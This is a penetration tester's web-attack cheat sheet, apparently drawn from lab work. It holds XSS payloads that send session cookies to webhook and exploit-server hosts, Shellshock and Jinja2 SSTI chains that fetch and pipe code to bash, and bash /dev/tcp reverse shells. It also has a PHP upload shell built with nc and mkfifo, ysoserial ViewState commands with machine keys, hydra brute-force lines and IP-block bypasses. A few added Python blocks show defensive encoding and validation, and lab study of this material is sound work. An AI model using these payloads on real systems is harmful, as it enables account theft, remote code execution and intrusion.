# Web Penetration
**Basic Information**
Checklist:
https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology
[PortSwigger WebSecurity Write-Up](/6XUFmwPkRAeVHV39XUS6oA)
**Useful browser extensions**
- Wappalyzer
- X-Forwarded-For
- Edit Cookie
- DotGit (.git leak check) | git-dumper (downloads the code)
Public server for testing out-of-band requests:
https://webhook.site
# WAF Bypass
## Fuzzing Filtered Characters
Wordlist:
/usr/share/seclists/Fuzzing/special-chars.txt
```bash
ffuf -request-proto http -request req1 -w /usr/share/seclists/Fuzzing/special-chars.txt -t 1
```
Match forbidden responses only (HTTP 403):
```bash
ffuf -request-proto http -request req1 -w /usr/share/seclists/Fuzzing/special-chars.txt -mc 403
```
![image](https://hackmd.io/_uploads/r1E_l8w7R.png)
## Request Size Limits
https://github.com/assetnote/nowafpls?tab=readme-ov-file#documented-waf-limitations
## No Spaces
URL-encoded whitespace substitutes:
```
%20
%09
%0D
%0C
%0B
%0A
%A0
```
Bash `${IFS}` as a space:
```bash
ls${IFS}-la
echo${IFS}meowkkkkkkkkkkk
cat${IFS}/*fla*
```
## Emoji Obfuscation
https://book.hacktricks.xyz/pentesting-web/unicode-injection#emoji-injection
https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209
💋 -> d"Y'< (the mis-decoded emoji ends in `<`)
💛 -> d"Y'> (the mis-decoded emoji ends in `>`)
// -> comments out the trailing d"Y' residue inside the JS handler
```
💋img src=x onerror=alert(document.domain)//💛
```
![image](https://hackmd.io/_uploads/SkluKKY40.png)
```
💋img/src=x onerror=alert(document.domain)//💛
💋svg/onload=alert`document.domain`//💛
💋iframe/src=javascript:alert`1`//💛
```
## SQL Injection
### Unicode Escapes
https://www.ifreesite.com/unicode-ascii-ansi.htm
Vulnerable pattern: PHP json_decode() turns the escape back into a quote
```
' -> \u27
' -> \u027
' -> \u0027
```
## XSS
### Between Tags
#### HTML
```html
<svg/onload=alert(/xss/)>
<img src="not_exist" onerror="alert(1)">
<img/src/onerror=alert(1)>
<svg onload=prompt()></svg>
<svg onload="alert(1)"></svg>
<link rel=attachment href="http://attacker.com">
```
**Multiple Zero**
```html
<svg onload=prompt()>
<svg onload="alert(1)"></svg>
```
#### Unicode
```html
<svg onload=prompt()></svg>
<svg onload=\u0070\u0072\u006f\u006d\u0070\u0074()></svg>
```
Works
### In URL
atob() is the browser's Base64 decode function
```javascript
atob`ZG9jdW1lbnQud3JpdGUoIjxoMT5UaGlzIGlzIHRlc3Q8L2gxPiIp`
```
```
Payload:
<img src=1 onerror=alert("Hello")>
Base64 encoded:
'PGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KCJIZWxsbyIpPg=='
URL:
?redirect=javascript:atob`PGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KCJIZWxsbyIpPg==`
```
# XSS
Leverage: the user's trust in the website (the user's browser itself is not vulnerable)
Injection sources:
- URL parameter
- URL file path
- POST data
- HTTP headers
Note: if the browser encodes the input before the application processes it, the XSS attack may not work.
## XSStrike (Auto)
**Useful options**
`--proxy` -> defaults to 0.0.0.0:8080
```bash
python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/?search=123 --proxy
```
`--crawl`
```bash
python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/ --crawl --level 4
```
### Single Endpoint
GET
```bash
python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/?search=123 --proxy
```
POST
```bash
python xsstrike.py -u "0a110090043fe54f816f7650004e00c4.web-security-academy.net/product?productId=1" --data "q=query"
```
DOM XSS: the `-u` scan also reports the vulnerable JavaScript code
![image](https://hackmd.io/_uploads/H10dsJPNC.png)
### Testing Blind XSS
Configuration in /core/config.py
![image](https://hackmd.io/_uploads/ByLMOLrUC.png)
`--blind` injects the blind XSS payload while crawling
```bash
# GET works; POST does not -> do it manually
python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind
```
### History
```bash
python xsstrike.py --seeds urls.txt
python xsstrike.py -u "http://example.com" -t 10 --crawl --level 3
```
## HTML Attributes
```html
# Tag close
"><script>alert(document.domain)</script> # search bar (most common)
"><iMg src=meow onerror=alert`meow`>
```
```html
# Attribute close
padding' autofocus onfocus=alert(document.domain) x='padding
padding" autofocus onfocus=alert(document.domain) x="padding
padding" autofocus onfocus=prompt`document.domain` x="padding
"123%0aaUtofocUS%0aONFOcUS=prompt('testing')``
# Option tags
padding" onclick=alert(1) x="padding
# Link tags
'accesskey='x'onclick='alert(1)
?'accesskey='x'onclick='alert(1)
# User-triggered: the victim presses the access key
ALT+SHIFT+X
CTRL+ALT+X
Alt+X
```
If the src attribute is controllable:
```
javascript:prompt(/xss/)
javascript:window.location=//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174
```
## Between Tags
### Testing HTML tags (some tags do not work)
```html
<b>meowhecker</b>
<s>meowhecker</s>
<hTML%0DoNPOInTeREnTEr%0D=%0Da=prompt,a()%0Dx>
<DEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx>3nd
</tiTLe><HtMl%09OnmoUseoVer%0d=%0d["nics113pt36507"].find(confirm)//
<iframe src=javascript:document.cookie;alert(1)></iframe>
<iframe src="<?php echo htmlspecialchars($_GET['src']) ?>">
# https://vul.com?src=javascript:alert(1)
window.location = 'javascript:alert(1)'
<a href=javascript:alert(1)>click Me</a>
```
### Closing Tags (</select>, </option>)
select, option
```html
</option></select><DEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx>3nd
```
### Load Remote HTML or Script (Blind XSS)
```html
<!-- Identify: a callback on the listener means the injection executed -->
<img src=//webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e?XsS onerror=prompt();>
<meta http-equiv="refresh" content="0; url=https://webhook.site/8ebdbec3-2440-4902-a029-09b70c44adaf/index.html">
<script src=http://webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e/csrf.js></script>
<img src="meowhecker" onerror="document.write('<script src="https://webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e"></script>')"/>
```
## XSS in JavaScript Context
### Break the JS String
Close the script tag (works when < and > are allowed)
```html
# Firefox, Chrome
</script><img/src=1 onerror=alert`document.domain`>
# Chrome
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
<DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt(document.domain),a()//
```
If ' or " is allowed but < is filtered
```
'-alert(1)-'
';alert(document.domain)//
'-document.write("<s>Meowhecker</s>")-'
# bypass (when ' is not allowed)
'-alert(1)-'
'-alert(1)-'
'-document.write("<s>Meowhecker</s>")-'
```
### JavaScript Template Literal XSS
Vulnerable code
```javascript
var name = `source can control` // JavaScript template literal
```
Exploit
```
${alert(document.domain)}
```
### Steal Cookie
```
javascript:window.location="//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174?a="+btoa(document.cookie)
<iframe src=javascript:window.location="//p7xye7qy9fvyogvam896eah4hvnmbcz1.oastify.com?a="+btoa(document.cookie)></iframe>
<svg onload=document.location='//exploit-0a9500bb032c0b9680c634b101d400fc.exploit-server.net/exploit?log='+btoa(document.cookie)></svg>
<script>window.location.href = "https://exploit-0a9c0098048473df859011c101d70033.exploit-server.net/exploit?log=" + document.cookie;</script>
<img src=//p5vt8fwjrjs5w7b0c8bcmkivhmndb3zs.oastify.com?image onerror=fetch(`//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174/?A=${encodeURIComponent(document.cookie)}`);>
```
```javascript
var link = document.createElement('meta');
link.httpEquiv = 'refresh';
link.content = '1; //mwoehcker.com?a=' + document.cookie;
document.getElementsByTagName('head')[0].appendChild(link);
```
Not verified
## In URL (javascript: scheme)
```html
javascript:\u0061lert`1`
javascript:\u{00000000000000000000061}\u006c\u0065\u0072\u0074`1`
```
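Defensive counterpart to the four contexts above (between tags, inside an attribute, inside a JS string, and a user-controlled URL), added here as an example and not part of the original notes: context-specific output encoding plus a scheme allow-list for redirect/href values. `render_search_page` and the other function names are assumptions for the illustration.

```python
import html
import json
import re
from typing import Optional
from urllib.parse import urlsplit

# Added example (not from the original notes): output encoding per context
# and a scheme allow-list. Function names and the sample page are assumed.

_CTRL = re.compile(r"[\x00-\x20\x7f]")  # browsers drop these before reading a scheme


def encode_text(value: str) -> str:
    """Between tags: escape & < > " ' so no tag can be opened."""
    return html.escape(value, quote=True)


def encode_attr(value: str) -> str:
    """Inside a quoted attribute (the caller MUST write the quotes)."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Inside a <script> string: a JSON literal with < > & and the JS line
    terminators U+2028/9 hex-escaped, so neither </script> nor a quote
    break-out ('-alert(1)-') can leave the string."""
    lit = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        lit = lit.replace(ch, esc)
    return lit


def safe_redirect_target(value: str, schemes=("http", "https")) -> Optional[str]:
    """Allow-list the scheme of a URL used in href/location. Returns the URL
    when it is http(s) or a same-site absolute path, else None. Control
    characters are stripped first, as the browser would, so a tab- or
    NUL-prefixed 'javascript:' cannot slip past the check."""
    cleaned = _CTRL.sub("", value)
    parts = urlsplit(cleaned)
    if parts.scheme:
        return cleaned if parts.scheme.lower() in schemes else None
    # No scheme: accept only an absolute path, not '//host' or '/\host'
    if cleaned.startswith("/") and cleaned[1:2] not in ("/", "\\"):
        return cleaned
    return None


def render_search_page(query: str, next_url: str) -> str:
    """Assumed reflected-search page using each encoder in its own context."""
    link = safe_redirect_target(next_url) or "/"
    return (
        f'<input name="q" value="{encode_attr(query)}">\n'
        f"<p>Results for {encode_text(query)}</p>\n"
        f'<a href="{encode_attr(link)}">continue</a>\n'
        f"<script>var q = {encode_js_string(query)};</script>"
    )
```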
# XSRF
Leverage: the server trusts the user's browser actions
## Exploit - CSRF Change Password
Basic (works)
```html
<html>
  <body>
    <form action="http://login.worldwap.thm/change_password.php" method="POST">
      <input type="hidden" name="new_password" value="meowmeow" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
URL filter bypass (works; the action URL is Base64-decoded at runtime)
```html
<html>
  <body>
    <form id="myForm" method="POST">
      <input type="hidden" name="new_password" value="meowmeow" />
    </form>
    <script>
      var form = document.getElementById("myForm");
      var actionUrl = atob("aHR0cDovL2xvZ2luLndvcmxkd2FwLnRobS9jaGFuZ2VfcGFzc3dvcmQucGhw");
      form.setAttribute("action", actionUrl);
      form.submit();
    </script>
  </body>
</html>
```
## Favicon (Detect Framework)
https://wiki.owasp.org/index.php/OWASP_favicon_database
```bash
wget -qO- <favicon-url> | md5sum
```
# CMS Scanner
## CMS Scanner (General)
https://github.com/Tuhinshubhra/CMSeeK
## wpscan
WordPress scanner
*Enumerate*
```bash
wpscan --url internal.thm/wordpress/
```
**Exploit** (Authentication Bypass)
Works on 5.4.2
```bash
wpscan --url $TARGET_DOMAIN/wordpress//wordpress/ --passwords rockyou.txt --usernames admin --max-threads 50
```
https://github.com/wpscanteam/wpscan
## joomscan Scanner
https://github.com/OWASP/joomscan
# Authentication Bypass
## List of Login bypass
https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
## Brute-Force Attack
[Remote Brute Force Login](/ngZz3rf5QMyfW_8cIGJHKw)
Response-time-based username enumeration:
- Set a long password (50~100 characters)
### Defense Mechanism
- IP block
- Account Limit
- Rate limit
### Bypass
#### IP Block
```
X-Forwarded-For: x
```
- Reset mechanism (script that adds a valid login to the wordlist):
https://raw.githubusercontent.com/Meowheckerrr/WebSecurity/main/ToolsDev/AddingValidStringToWordlist/addingValidBypassIpBlock.py
#### Account Limit
Way 1 - Password spraying
Step 1: enumerate -> user list (from the responses)
Step 2: choose a very small shortlist of passwords; it must be smaller than the attempt limit.
Way 2 - Credential stuffing attacks
### Username Enumeration
- Forgot password
- Login page
- Account lockout mechanism -> error message
### Password Brute Force
#### Post-Form Brute Force
```bash
WEB_URL='/wp-login.php'
PARAMETERS='log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.125.64%2Fwp-admin%2F&testcookie=1'
hydra -l 'elliot' -P rockyou.txt $TARGET_IP http-post-form "$WEB_URL:$PARAMETERS:The password you entered for the username" -vV -t 10
```
#### HTTP Basic Authentication
Login methods
```
http://username:password@HOST_DOMAIN_AND_IP
```
![image](https://hackmd.io/_uploads/SktY3Mcx0.png)
```
Authorization: Basic base64('username:password')
```
![image](https://hackmd.io/_uploads/ByBc3f9lA.png)
```bash
hydra -l 'admin' -P rockyou.txt -s 80 $TARGET_IP http-get $WEB_URL -v
```
# HTTP Header Bypass
## Rewrite IP Source & Rewrite Request Path
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/special-http-headers#headers-to-change-location
Request path rewriting headers
```
X-Original-URL
X-Rewrite-URL
```
# Access Control
## Method Bypass
Original request
```
POST /admin-roles
username=carlos&action=upgrade
```
Exploit (unrecognised method with the parameters in the query string)
```
POSTA /admin-roles?username=wiener&action=upgrade
```
Works
Flawed checks
- Unprotected URL
- Parameter-based flaws
- URL-based access control (proxy) & HTTP header bypass
- Proxy and framework URL-matching discrepancies
- Method-based flaws
# LDAP Injection
https://129538173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-a58ea2462cf2b98a868750b068a00fa32ccb807b%2FEN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf?alt=media
![image](https://hackmd.io/_uploads/SyAOZnpG0.png)
## Auth Bypass
Normal filter query
```
(&(USER=admin)(PASSWORD=pass))
```
Bypass (supplied as the username)
```
admin)(&))
```
## Information Disclosure
Normal filter query
```
(|(type=Object1)(type=Object2))
```
Malicious input (injected in place of Object1)
```
computer)(uid=*)
```
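Added example (not part of the original notes): the two filters above built with RFC 4515 escaping, so the `admin)(&))` and `computer)(uid=*)` inputs stay inside their assertion values instead of closing them; the function names are assumptions.

```python
# Added example (not from the original notes): RFC 4515 escaping for the
# login and type filters discussed above. Function names are assumptions.

_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def ldap_escape(value: str) -> str:
    """Escape the characters RFC 4515 section 3 reserves in assertion values."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def login_filter(user: str, password: str) -> str:
    """The (&(USER=...)(PASSWORD=...)) query with both values escaped."""
    return f"(&(USER={ldap_escape(user)})(PASSWORD={ldap_escape(password)}))"


def type_filter(type1: str, type2: str) -> str:
    """The (|(type=...)(type=...)) query with both values escaped."""
    return f"(|(type={ldap_escape(type1)})(type={ldap_escape(type2)}))"


def filter_is_balanced(flt: str) -> bool:
    """Secondary tripwire for logging: parentheses must balance when \XX
    escapes are treated as data. Both raw injections above fail this check;
    it is not a substitute for escaping (balanced injections exist)."""
    depth, i = 0, 0
    while i < len(flt):
        ch = flt[i]
        if ch == "\\":          # \XX escape: skip the two hex digits
            i += 3
            continue
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
        i += 1
    return depth == 0
```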
# Command Injection
## Payload
![image](https://hackmd.io/_uploads/HkRXkriQ0.png)
```
`sleep 5`
```
## Bash Shell
![image](https://hackmd.io/_uploads/HJQTg-de0.png)
(default command) + (injection point)
```bash
() { :; }; sleep 10
# or
() { :; }; ping 127.0.0.1 -c 10
# or
() { :; }; curl http://ik63y1ea94vws1xaeeo2ujwspjvaj87x.oastify.com
```
## CLI No Space
See the "No Spaces" list under WAF Bypass above.
## RevShell
Linux
```bash
# Attacker host: serve the reverse shell script
echo "bash -i >& /dev/tcp/10.10.14.12/443 0>&1" > revshell
python3 -m http.server 80
```
```bash
# Target: fetch and run it
curl http://10.10.14.12/revshell -o /tmp/revshell
bash /tmp/revshell
```
# NoSQL Injection
Table -> collection
Records -> document
Normal query
```javascript
db.handgun.find({"owner":"meowhecker"})
```
# SQL Injection
## Filter Bypass
XML obfuscation
```sql
1 UNION SELECT null-- -
1 UNION SELECT null-- -
```
Works
## Manual Exploit
**Show tables**
```sql
union select table_name from information_schema.tables-- -
```
Works
**Show columns (of a given table)**
```sql
union select column_name from information_schema.columns where table_name='users'-- -
```
**Retrieve data**
```sql
union select username || '~' || password from users
UNION SELECT CONCAT(email, '|', password, '|', username) AS meow FROM users
```
Works
## sqlmap
https://github.com/sqlmapproject/sqlmap
https://www.geeksforgeeks.org/use-sqlmap-test-website-sql-injection-vulnerability/
WAF bypass (reference)
https://www.vaadata.com/blog/exploiting-an-sql-injection-with-waf-bypass/
Default User-Agent:
```
sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)
```
### Useful Options
**--random-agent**
Use a random User-Agent header instead of the default above
**--tamper**
Encode/obfuscate the payload with tamper scripts
https://muhdaffa.medium.com/tips-and-tricks-for-effective-sql-injection-testing-using-sqlmap-tamper-scripts-ed4bfa5717e7
F5 bypass, e.g. unicode bypass:
```bash
sqlmap -r req --tamper=charunicodeescape -p user -t 10 --dbs
```
**--delay**
Avoid being rate-limited by the WAF
Important
```
--delay 1
--delay 3 (stable)
--delay 5 (stable)
```
**--proxy**
Route the traffic through the Burp proxy
**--level 5 --risk 3**
Try the full payload set (best effort)
**--batch**
Use the default answer for every prompt
**--dbs**
Enumerate database names
**--dump-all**
Dump everything
**--exclude-sysdbs**
Skip the system databases
**--ignore-timeouts**
Ignore connection timeouts
**--threads**
Number of concurrent requests
### Basic Usage:
```bash
# No WAF
sqlmap -r req --dbs --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 -p d
sqlmap -r req --random-agent --dbs --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --threads=10
# WAF
sqlmap -r req --random-agent --tamper=charunicodeescape --delay 1 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080
sqlmap -r req --tamper=charunicodeescape --delay 1 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dbs --exclude-sysdbs --dump-all
sqlmap -r req --random-agent --tamper=charunicodeescape -p user --dbs --dbms=mysql --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --delay 3
sqlmap -r req1 --random-agent --tamper=charunicodeescape --delay 3 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dbs --exclude-sysdbs --dump-all
sqlmap -r req1.txt --risk=3 --level=5 --random-agent --dbs -p username
```
More examples
```bash
sqlmap -u "http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```
Vulnerable website -> http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml
risk -> depth of the tests
level -> complexity of the tests
random-agent -> random User-Agent header
dbs -> enumerate the database names
p -> the vulnerable parameter
### Exploitation
Task -> find the admin credentials
Listing information
-D -> database
-T -> table
Show tables
```bash
sqlmap -r apiTest.txt -D vn_admin --tables
```
Show columns
```bash
sqlmap -r apiTest.txt -D vn_admin -T fe_users --columns
```
Dump data
```bash
sqlmap -r apiTest.txt -D vn_admin -T fe_users -C password --dump
```
# Custom Tamper Script
Example
```python
#!/usr/bin/env python
# sqlmap tamper script: wraps keywords in MySQL version comments and
# replaces spaces with /**/


def dependencies():
    pass


def tamper(payload: str, **kwargs):
    CrucialString = [
        'DATABASE()', 'FROM', 'schema_name', 'INFORMATION_SCHEMA.SCHEMATA', 'table_name',
        'INFORMATION_SCHEMA.TABLES', 'table_schema', 'column_name', 'INFORMATION_SCHEMA.COLUMNS'
    ]
    if payload:
        if 'UNION' in payload:
            payload = payload.replace('UNION', '/*!--%20-%0AuNiOn%23a%0A*/')
        if payload.startswith('42 '):
            payload = payload.replace('42 ', '42 and 0 ')
        for i in CrucialString:
            if i in payload:
                payload = payload.replace(i, f'/*!50000{i}%23a%0A*/')
        if '-- ' in payload:
            payload = payload.replace('-- ', '--%20')
        payload = payload.replace(' ', '/**/')
    return payload
```
# Deserialization
## ASP.NET
### Exploit the __VIEWSTATE Parameter
Ref: https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter
This parameter is used to preserve page and control state across requests; it is generated while the page HTML is rendered.
#### Case 1
EnableViewStateMac = True/False (?)
ViewStateEncryptionMode = True
web.config (found by fuzzing)
```xml
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
```
Generate the payload
Notice the --path value
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
```
Works (without quotes)
```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "ping 10.10.14.5" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3
```
Listener on the VPN interface
```bash
sudo tcpdump -ni tun0 icmp
```
# SSTI
Reference:
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
Fuzzing - identify the template engine
```
${{<%[%'"}}%\
<%=meowhecker%>
{{6*9}}
${6*9}
-> error message (division by zero)
{{7/0}}
${7/0}
```
## Plaintext Context (Injected Expression)
ERB (template engine)
```erb
<%= system("whoami") %>
```
Handlebars: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs (blind RCE works)
## Code Context (Close the Expression)
Tornado (template engine)
```
"A" }} {{Exploit-Methods or Objects}} {{"B"
"meowHead" }} {% import os %} {{os.system('whoami')}} {{"meowTail"
```
## RCE
Python - Jinja2 (filter bypass)
https://starlox.medium.com/hackthebox-iclean-writeup-cfc46f351353
Reverse shell script served from the attacker host (fetched by the payload below):
```bash
bash -i >& /dev/tcp/10.10.14.79/443 0>&1
```
```
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl 10.10.14.79:80/reshell | bash")|attr("read")()}}
```
# API Testing
## Bearer Token Auth (Bypasses the CSRF Requirement)
Bearer Token authentication: the client explicitly sets an Authorization header containing the Bearer Token on the request. Because the browser does not attach this header automatically, an attacker cannot use the user's identity to send unauthorized requests.
Bearer Tokens are a secure authentication method that effectively prevents CSRF attacks.
Delete the cookie -> the server verifies the request with the Bearer Token instead
```
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Host: teamcity.runner.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.VHNYZVRNS0t3UWlkeXVEeklQSUFUVDJWTk1j.YjhjYTIyZTEtNTQwNi00ZjQ5LWJmOTEtNjkyODkwNTUxYTQx
Connection: close
```
# Fuzzing
Tool list
-> ffuf
-> Burp Suite Professional
Documentation -> ffuf: fuzzing multiple locations
https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html#fuzzing-multiple-locations
(To read)
## Hidden Parameters
When a sensitive .php or .asp page is found that returns a blank page or a "parameter missing" error:
### Arjun (recommended tool)
```bash
arjun -u http://internal.analysis.htb/users/list.php
```
## Valid Extensions
```bash
ffuf -request-proto http -request req -w /usr/share/seclists/Fuzzing/extensions-most-common.fuzz.txt
```
# Path Traversal
```
http://meowhecker.com/index.php?file="filePath"
```
Fuzzing
**Linux**
```
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
```
**Windows**
Fuzzing lists
```bash
wget https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/dirTraversal-win.txt
wget https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt
```
Found: win.ini
```bash
ffuf -request-proto https -request req -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fs 15
ffuf -request-proto http -request req -w ./dirTraversal-win.txt -fs 15
```
## Exploit
- Windows
https://gist.github.com/SleepyLctl/823c4d29f834a71ba995238e80eb15f9
- hMailServer (username, password)
C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini
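Added example, not from the original notes: a resolve-then-check containment test for the `file=` parameter above that rejects both the Linux and the Windows traversal forms without a "../" blocklist; `BASE_DIR` and the function names are assumptions.

```python
from pathlib import Path
from typing import Optional

# Added example (not from the original notes): resolve the requested path
# against a fixed base directory and refuse anything that escapes it.
# BASE_DIR is an assumed document root; it need not exist for the check.

BASE_DIR = Path("/var/www/files")


def resolve_under_base(user_path: str, base: Path = BASE_DIR) -> Optional[Path]:
    """Return the resolved path if it stays inside base, otherwise None."""
    if not user_path or "\x00" in user_path:
        return None                       # NUL truncation tricks
    # Treat backslashes as separators too: a Windows back end would.
    normalised = user_path.replace("\\", "/")
    if normalised.startswith("/") or ":" in normalised:
        return None                       # absolute paths / drive letters
    base_real = base.resolve()
    # resolve() collapses every ".." (and follows symlinks) before the check,
    # so "....//" style and deeply nested variants are judged by where they land.
    candidate = (base_real / normalised).resolve()
    if candidate != base_real and base_real not in candidate.parents:
        return None                       # escaped the base directory
    return candidate


def open_document(user_path: str):
    """How the file=... parameter above should be served."""
    target = resolve_under_base(user_path)
    if target is None:
        raise PermissionError("path outside document root")
    return target.open("rb")
```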
# File Upload
Extension wordlist
/usr/share/wordlists/dirb/extensions_common.txt
Check what kind of filter the upload page applies
## Bypass
### Content-Type Check
![image](https://hackmd.io/_uploads/Hy6hfaWyC.png)
Bypass the Content-Type check (multipart part headers + body):
```
Content-Disposition: form-data; name="file"; filename="shell.jpg.php"
Content-Type: image/jpeg

<?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.17.1.166 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?>
```
### Extension Check
Multiple extensions
```
shell.jpg.php
shell.php.jpg
```
Next step (verify each one)
```
shell.php%0a%0d.jpg
shell.php%0d%0a.jpg
shell.php .jpg
shell.php%00.jpg
shell.php/x00.jpg
```
If one works, exploit:
```
cp shell.php%0a%0d.jpg shell.php   # the service will store it as shell.php
```
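Added example (not part of the original notes): server-side checks that reject every bypass file name listed above and tie the declared extension to the file's magic bytes; the allowed extensions, magic numbers and function names are assumptions.

```python
import re
import uuid
from typing import Optional, Set, Tuple

# Added example (not from the original notes): file name and content
# validation for an image upload. Allowed extensions, magic numbers and
# function names are assumptions for this illustration.

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")   # no '%', spaces or dots
_MAGIC = {
    b"\xff\xd8\xff": {"jpg", "jpeg"},
    b"\x89PNG\r\n\x1a\n": {"png"},
    b"GIF87a": {"gif"},
    b"GIF89a": {"gif"},
}


def validate_upload_name(filename: str) -> Optional[Tuple[str, str]]:
    """Return (stem, ext) for an acceptable name, None otherwise."""
    if any(ord(c) < 0x20 or c == "\x7f" for c in filename):
        return None           # raw NUL / CR / LF, e.g. shell.php\n\r.jpg
    if "/" in filename or "\\" in filename:
        return None           # no path components in a file name
    parts = filename.split(".")
    if len(parts) != 2:
        return None           # exactly one extension: rejects shell.jpg.php
    stem, ext = parts
    ext = ext.lower()
    if ext not in ALLOWED_EXT or not _SAFE_STEM.match(stem):
        return None           # 'php%0a%0d', 'php ' etc. fail the stem regex
    return stem, ext


def image_exts_from_magic(data: bytes) -> Set[str]:
    """Extensions consistent with the leading bytes (empty set if unknown)."""
    for magic, exts in _MAGIC.items():
        if data.startswith(magic):
            return exts
    return set()


def storage_name(filename: str, data: bytes, token: Optional[str] = None) -> Optional[str]:
    """Name the file on disk ourselves: random stem + the validated extension.
    The declared extension must agree with the magic bytes. Magic bytes can
    still be prepended to a script (see the exiftool PoC below), so the upload
    directory must additionally be served without script execution."""
    checked = validate_upload_name(filename)
    if checked is None:
        return None
    _, ext = checked
    if ext not in image_exts_from_magic(data):
        return None
    return f"{token or uuid.uuid4().hex}.{ext}"
```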
## Magic String (Code Injection)
Way 1:
PoC
```bash
exiftool -Comment="<?php echo 'START ' . phpinfo() . ' END'; ?>" ./Cat03.jpg -o JPGwithPHPinfo.php
```
![image](https://hackmd.io/_uploads/rJQuybwm0.png)
## HTTP Verb (PUT)
```
PUT /images/exploit.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 24

<?php echo phpinfo(); ?>
```
## Exploit - Read Sensitive Files (.shtm/.shtml - SSI)
Payload
read.shtml
```html
<!--#include file="web.config" -->
